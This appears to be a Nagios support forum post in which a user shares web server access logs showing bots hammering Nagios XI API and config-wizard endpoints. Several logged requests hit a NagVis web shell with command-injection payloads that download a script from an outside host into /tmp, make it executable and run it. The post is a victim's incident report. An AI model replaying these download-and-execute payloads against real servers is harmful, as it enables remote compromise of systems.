Nagios Support Forum

Support for Nagios products and services
https://support.nagios.com/forum/

XI being targeted by exploit bots

https://support.nagios.com/forum/viewtopic.php?t=61502

Page 1 of 1

XI being targeted by exploit bots

Posted: Fri Jan 29, 2021 11:50 am
by GldRush98
I don't know what they're looking for, but they're sending data to XI-specific URL's.

I found this while tracking down an I/O spike that caused my MariaDB tables to crash several times now. I have discovered that along with each table crash (caused by extremely high I/O I believe), that my system was hammered but a very large number of http calls.

Here is a small sample of the calls that were logged

Code: Select all

45.138.209.197 - - [12/Jan/2021:03:08:03 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [12/Jan/2021:03:08:03 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [12/Jan/2021:03:08:05 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [12/Jan/2021:03:08:03 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [12/Jan/2021:03:08:18 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 32
45.138.209.197 - - [12/Jan/2021:03:08:18 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 32
45.138.209.197 - - [12/Jan/2021:03:08:16 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 32
45.138.209.197 - - [12/Jan/2021:03:08:16 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 32
45.138.209.197 - - [12/Jan/2021:03:08:15 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 32
45.138.209.197 - - [12/Jan/2021:03:08:15 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 32
45.138.209.197 - - [12/Jan/2021:03:08:15 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 32
45.138.209.197 - - [12/Jan/2021:03:08:18 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 32
45.138.209.197 - - [12/Jan/2021:03:08:15 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 32
45.138.209.197 - - [12/Jan/2021:03:08:15 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 32
45.138.209.197 - - [12/Jan/2021:03:08:16 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 32
45.138.209.197 - - [12/Jan/2021:03:08:19 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 32
45.138.209.197 - - [12/Jan/2021:22:24:40 -0600] "GET /nagvis/userfiles/scripts HTTP/1.1" 301 255
45.138.209.197 - - [12/Jan/2021:22:24:41 -0600] "GET /nagvis/userfiles/scripts/ HTTP/1.1" 403 227
45.138.209.197 - - [12/Jan/2021:22:24:41 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 32
45.138.209.197 - - [12/Jan/2021:22:24:41 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 32
45.138.209.197 - - [12/Jan/2021:22:24:42 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 32
45.138.209.197 - - [12/Jan/2021:22:24:41 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 32
45.138.209.197 - - [12/Jan/2021:22:24:41 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 32
45.138.209.197 - - [12/Jan/2021:22:24:58 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 32
45.138.209.197 - - [12/Jan/2021:22:24:54 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 32
45.138.209.197 - - [12/Jan/2021:22:24:54 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 32
45.138.209.197 - - [12/Jan/2021:22:24:51 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 32
45.138.209.197 - - [12/Jan/2021:22:24:56 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 32
45.138.209.197 - - [12/Jan/2021:22:24:53 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 32
45.138.209.197 - - [12/Jan/2021:22:24:57 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 32
45.138.209.197 - - [12/Jan/2021:22:24:53 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 32
45.138.209.197 - - [12/Jan/2021:22:24:50 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 32
45.138.209.197 - - [12/Jan/2021:22:25:46 -0600] "-" 408 -
45.138.209.197 - - [12/Jan/2021:22:25:46 -0600] "-" 408 -
45.138.209.197 - - [12/Jan/2021:22:25:47 -0600] "GET /nagvis/userfiles/scripts/userfile.php?cmd=system(%22wget%20-q%20https://jquery-dns-07.dns05.com:8080/watch.sh%20-O%20/tmp/watch.sh%22); HTTP/1.1" 404 235
45.138.209.197 - - [12/Jan/2021:22:24:59 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 32
45.138.209.197 - - [12/Jan/2021:22:25:49 -0600] "GET /nagvis/userfiles/scripts/userfile.php?cmd=system(%22chmod%20777%20/tmp/watch.sh%22); HTTP/1.1" 404 235
45.138.209.197 - - [12/Jan/2021:22:24:57 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 32
45.138.209.197 - - [12/Jan/2021:22:25:58 -0600] "GET /nagvis/userfiles/scripts/userfile.php?cmd=system(%22/tmp/watch.sh%22); HTTP/1.1" 404 235
45.138.209.197 - - [12/Jan/2021:22:24:58 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [12/Jan/2021:22:25:00 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [12/Jan/2021:22:24:57 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [12/Jan/2021:22:24:59 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [12/Jan/2021:22:25:01 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [12/Jan/2021:22:24:57 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [12/Jan/2021:22:24:58 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [12/Jan/2021:22:24:59 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [12/Jan/2021:22:25:25 -0600] "POST /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 2
45.138.209.197 - - [12/Jan/2021:22:25:16 -0600] "POST /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 2
45.138.209.197 - - [12/Jan/2021:22:25:25 -0600] "POST /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [12/Jan/2021:22:25:11 -0600] "POST /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [12/Jan/2021:22:25:18 -0600] "POST /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [12/Jan/2021:22:25:18 -0600] "POST /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [12/Jan/2021:22:25:14 -0600] "POST /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [12/Jan/2021:22:25:10 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [12/Jan/2021:22:25:10 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [12/Jan/2021:22:25:10 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [12/Jan/2021:22:25:10 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [12/Jan/2021:22:25:11 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [12/Jan/2021:22:25:10 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [12/Jan/2021:22:25:00 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [12/Jan/2021:22:25:10 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [12/Jan/2021:22:25:10 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [12/Jan/2021:22:25:10 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [12/Jan/2021:22:25:02 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [12/Jan/2021:22:25:01 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [12/Jan/2021:22:25:11 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [12/Jan/2021:22:25:10 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [12/Jan/2021:22:25:11 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [12/Jan/2021:22:25:10 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [12/Jan/2021:22:25:11 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [12/Jan/2021:22:25:14 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [12/Jan/2021:22:25:16 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [12/Jan/2021:22:25:25 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [12/Jan/2021:22:25:17 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [12/Jan/2021:22:25:16 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [12/Jan/2021:22:25:12 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [12/Jan/2021:22:25:18 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [12/Jan/2021:22:25:16 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [12/Jan/2021:22:25:16 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [12/Jan/2021:22:25:16 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [12/Jan/2021:22:25:17 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [12/Jan/2021:22:25:17 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [12/Jan/2021:22:25:25 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [12/Jan/2021:22:25:25 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [12/Jan/2021:22:25:25 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [12/Jan/2021:22:25:25 -0600] "POST /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [13/Jan/2021:10:08:59 -0600] "GET /nagvis/userfiles/scripts HTTP/1.1" 301 255
45.138.209.197 - - [13/Jan/2021:10:08:59 -0600] "GET /nagvis/userfiles/scripts/ HTTP/1.1" 403 227
45.138.209.197 - - [13/Jan/2021:10:09:00 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [13/Jan/2021:10:09:02 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [13/Jan/2021:10:09:02 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [13/Jan/2021:10:09:26 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:26 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:28 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:27 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:32 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:31 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:33 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:31 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:28 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:36 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:36 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:37 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:37 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:37 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:37 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:38 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:38 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:38 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:38 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:38 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:39 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:39 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:39 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:39 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:40 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:40 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:40 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:40 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:40 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:41 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:41 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:09 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [13/Jan/2021:10:09:41 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:41 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:42 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:42 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:42 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:42 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:42 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:43 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:08 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [13/Jan/2021:10:09:43 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:43 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:03 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [13/Jan/2021:10:09:44 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:08 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [13/Jan/2021:10:09:44 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:44 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:44 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:44 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:44 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:45 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:45 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:04 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [13/Jan/2021:10:09:46 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:09 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [13/Jan/2021:10:09:09 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [13/Jan/2021:10:09:09 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [13/Jan/2021:10:09:46 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:46 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:46 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:46 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:47 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:46 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:46 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:08 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [13/Jan/2021:10:09:09 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [13/Jan/2021:10:09:09 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [13/Jan/2021:10:09:47 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:22 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [13/Jan/2021:10:09:48 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:49 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:05 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [13/Jan/2021:10:09:49 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:49 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:49 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:49 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:10 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [13/Jan/2021:10:09:50 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:50 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:09 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [13/Jan/2021:10:09:08 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [13/Jan/2021:10:09:09 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [13/Jan/2021:10:09:09 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [13/Jan/2021:10:09:08 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [13/Jan/2021:10:09:06 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [13/Jan/2021:10:09:09 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [13/Jan/2021:10:09:13 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [13/Jan/2021:10:09:09 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [13/Jan/2021:10:09:18 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [13/Jan/2021:10:09:16 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [13/Jan/2021:10:09:14 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [13/Jan/2021:10:09:09 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [13/Jan/2021:10:09:22 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [13/Jan/2021:10:09:15 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [13/Jan/2021:10:09:16 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [13/Jan/2021:10:09:51 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:16 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [13/Jan/2021:10:09:53 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:19 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [13/Jan/2021:10:09:25 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [13/Jan/2021:10:09:21 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [13/Jan/2021:10:09:13 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [13/Jan/2021:10:10:01 -0600] "GET /nagvis/userfiles/scripts/userfile.php?cmd=system(%2522wget%2520-q%2520https://jquery-dns-07.dns05.com:8080/watch.sh%2520-O%2520/tmp/watch.sh%2522); HTTP/1.1" 404 235
45.138.209.197 - - [13/Jan/2021:10:09:28 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [13/Jan/2021:10:09:26 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [13/Jan/2021:10:10:03 -0600] "GET /nagvis/userfiles/scripts/userfile.php?cmd=system(%2522chmod%2520777%2520/tmp/watch.sh%2522); HTTP/1.1" 404 235
45.138.209.197 - - [13/Jan/2021:10:09:26 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [13/Jan/2021:10:09:24 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [13/Jan/2021:10:09:28 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [13/Jan/2021:10:09:24 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [13/Jan/2021:10:09:26 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [13/Jan/2021:10:09:29 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [13/Jan/2021:10:09:31 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [13/Jan/2021:10:09:27 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [13/Jan/2021:10:09:31 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [13/Jan/2021:10:09:21 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [13/Jan/2021:10:09:34 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [13/Jan/2021:10:10:04 -0600] "GET /nagvis/userfiles/scripts/userfile.php?cmd=system(%2522/tmp/watch.sh%2522); HTTP/1.1" 404 235
45.138.209.197 - - [13/Jan/2021:10:09:35 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [13/Jan/2021:10:09:53 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:55 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:34 -0600] "GET /nagiosxi/api/v1/index.php HTTP/1.1" 200 298
45.138.209.197 - - [13/Jan/2021:10:09:54 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:54 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:54 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:55 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
45.138.209.197 - - [13/Jan/2021:10:09:59 -0600] "GET /nagiosxi/includes/configwizards/docker/table_population.php HTTP/1.1" 200 12
Some more...

Code: Select all

